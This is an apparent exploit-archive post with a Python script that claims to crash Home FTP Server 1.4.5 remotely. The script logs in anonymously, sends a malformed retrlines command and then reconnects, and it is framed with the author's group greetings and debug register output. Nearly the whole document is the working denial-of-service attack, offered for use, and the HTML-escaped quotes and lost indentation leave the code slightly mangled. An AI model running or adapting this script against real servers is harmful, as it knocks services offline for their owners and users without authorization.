Home FTP Server 1.4.5 Remote Denial of Service Exploit
======================================================





# Discovered by 0in from DaRk-CodeRs Programming & Security Group
# Contact: 0in(dot)email[at]gmail(dot)com
# Thats a very funny bug, and nobody understand how it works;]
# When we send a python FTP retrlines() function bad command and create
# a new connection server got DoS... o0
# Thats not overflow, it&#039;s probubly in logic application.
# Greetings to all DaRk-CodeRs Members:
# Die_Angel, Sun8hclf, M4r1usz, Djlinux, Aristo89
# Special THX to: Rade0n3900
# Debug:
# ----------------------
# | EIP: 0100FE98 |
# | DS:[00FFFFED4]=??? |
# | ECX: 0100FED4 |
# ----------------------
from ftplib import FTP
import time
ip="127.0.0.1"
login="anonymous"
passwd = &#039;gorion@scriptkiddie.pl&#039;
print &#039;-------------------------------&#039;
print &#039;| HOME FTP SERVER DoS Exploit |&#039;
print &#039;| bY 0in From Dark-Coders! |&#039;
print &#039;|>>http://dark-coders.4rh.eu<<|&#039;
print &#039;-------------------------------&#039;
print &#039;connecting...&#039;
ftp=FTP(ip)
ftp.login(login,passwd)
print &#039;sending...&#039;
try:
ftp.retrlines("AAAA")
except Exception:
print &#039;ok!\nreconnecting...&#039;
ftp=FTP(ip)
ftp.quit()
print &#039;DosEd&#039;
#EoFF




